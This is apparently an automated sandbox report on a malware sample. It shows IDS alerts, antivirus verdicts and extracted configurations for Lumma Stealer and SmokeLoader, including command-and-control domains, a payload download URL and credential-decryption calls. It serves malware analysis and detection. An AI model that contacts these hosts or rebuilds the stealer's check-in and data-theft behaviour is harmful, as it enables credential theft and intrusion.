Source Port:	58583
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T07:30:39.715309+0200
SID:	2054602
Source Port:	51841
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:29:32.020781+0200
SID:	2039103
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:29:35.166669+0200
SID:	2039103
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.5

Timestamp:	2024-07-27T07:29:19.712545+0200
SID:	2022930
Source Port:	443
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.5

Timestamp:	2024-07-27T07:29:39.104284+0200
SID:	2022930
Source Port:	443
Destination Port:	51801
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T07:30:33.323747+0200
SID:	2054602
Source Port:	51828
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:29:30.949708+0200
SID:	2039103
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T07:30:34.994898+0200
SID:	2054653
Source Port:	51828
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:29:29.866818+0200
SID:	2039103
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 177.222.41.236

Timestamp:	2024-07-27T07:32:52.360327+0200
SID:	2039103
Source Port:	51919
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:38.095317+0200
SID:	2039103
Source Port:	51833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:36.566326+0200
SID:	2039103
Source Port:	51831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (callosallsaospz .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-07-27T07:30:32.797303+0200
SID:	2054591
Source Port:	59813
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:06.486304+0200
SID:	2039103
Source Port:	51806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:01.844584+0200
SID:	2039103
Source Port:	51803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:29:36.305344+0200
SID:	2039103
Source Port:	51797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:03.398860+0200
SID:	2039103
Source Port:	51804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 177.222.41.236

Timestamp:	2024-07-27T07:33:01.524190+0200
SID:	2039103
Source Port:	51925
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.5 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:33:11.960131+0200
SID:	2054604
Source Port:	51929
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 185.149.100.242 - Destination IP: 192.168.2.5

Timestamp:	2024-07-27T07:30:18.160658+0200
SID:	2011803
Source Port:	443
Destination Port:	51812
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:31:01.177740+0200
SID:	2039103
Source Port:	51858
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:34.994574+0200
SID:	2039103
Source Port:	51827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 185.149.100.242 - Destination IP: 192.168.2.5

Timestamp:	2024-07-27T07:30:15.947592+0200
SID:	2011803
Source Port:	443
Destination Port:	51812
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T07:30:41.229671+0200
SID:	2054602
Source Port:	51844
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.5 - Destination IP: 31.14.70.245

Timestamp:	2024-07-27T07:30:48.719804+0200
SID:	2803274
Source Port:	51850
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T07:30:36.550915+0200
SID:	2054653
Source Port:	51832
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T07:30:36.137515+0200
SID:	2054602
Source Port:	51832
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 177.222.41.236

Timestamp:	2024-07-27T07:32:34.909550+0200
SID:	2039103
Source Port:	51908
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 177.222.41.236

Timestamp:	2024-07-27T07:32:43.542296+0200
SID:	2039103
Source Port:	51914
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.5

Timestamp:	2024-07-27T07:29:40.183846+0200
SID:	2022930
Source Port:	443
Destination Port:	51802
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 185.149.100.242 - Destination IP: 192.168.2.5

Timestamp:	2024-07-27T07:30:15.807909+0200
SID:	2011803
Source Port:	443
Destination Port:	51812
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:26.027537+0200
SID:	2039103
Source Port:	51816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:08.032304+0200
SID:	2039103
Source Port:	51807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:27.624152+0200
SID:	2039103
Source Port:	51818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://callosallsaospz.shop/api	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apicnmamaa	Avira URL Cloud: Label: malware
Source: lariatedzugspd.shop	Avira URL Cloud: Label: malware
Source: callosallsaospz.shop	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/bO	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/e	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/b	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apioro	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/m	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/h	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/i	Avira URL Cloud: Label: malware
Source: https://funrecipebooks.com/setups.exe	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/o	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/D	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apiQbd	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apisF	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apiem	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop///	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apiyy	Avira URL Cloud: Label: malware
Source: https://mussangroup.com/wp-content/images/pic1.jpg	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/0	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\sashibt

Avira: detection malicious, Label: HEUR/AGEN.1312596

Found malware configuration

Source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}
Source: 7C81.exe.5268.10.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "bOKHNM--"}

Multi AV Scanner detection for domain / URL

Source: liernessfornicsa.shop	Virustotal: Detection: 19%	Perma Link
Source: mussangroup.com	Virustotal: Detection: 13%	Perma Link
Source: callosallsaospz.shop	Virustotal: Detection: 19%	Perma Link
Source: https://callosallsaospz.shop/api	Virustotal: Detection: 22%	Perma Link
Source: lariatedzugspd.shop	Virustotal: Detection: 19%	Perma Link
Source: callosallsaospz.shop	Virustotal: Detection: 19%	Perma Link
Source: liernessfornicsa.shop	Virustotal: Detection: 19%	Perma Link
Source: https://callosallsaospz.shop/i	Virustotal: Detection: 17%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\3530.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\sashibt	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 50%
Source: file.exe	Virustotal: Detection: 42%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\3530.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sashibt	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: indexterityszcoxp.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lariatedzugspd.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: callosallsaospz.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: outpointsozp.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: liernessfornicsa.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: upknittsoappz.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shepherdlyopzc.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: unseaffarignsk.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: callosallsaospz.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: bOKHNM--

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 14_2_004D7A10 CryptUnprotectData,

14_2_004D7A10

Source: 3530.exe, 00000008.00000003.2795754457.000001B962AE1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_f5cb06df-e

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.5:51812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.5:51821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.5:51837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.5:51842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51872 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51881 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51886 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51890 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51898 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51904 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51905 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51906 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51907 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51909 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51910 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51913 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51915 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51924 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51926 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51928 version: TLS 1.2

Source:	Binary string: BitLockerToGo.pdb source: 7C81.exe, 0000000A.00000003.2938083888.0000022AE3FC0000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000003.2937937512.0000022AE4000000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956327407.000000C000480000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000966000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: 7C81.exe, 0000000A.00000003.2938083888.0000022AE3FC0000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000003.2937937512.0000022AE4000000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956327407.000000C000480000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000966000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+50h]	14_2_004D91C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+54h]	14_2_004D7189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	14_2_004D7189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	14_2_004C3260
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+54h]	14_2_004D72DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	14_2_004D72DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	14_2_004FA479
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp]	14_2_004F9C20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push eax	14_2_004F3CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp+30h]	14_2_004CFCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp+00000200h]	14_2_004CFCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	14_2_004D6CB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+70h]	14_2_004D7DEB
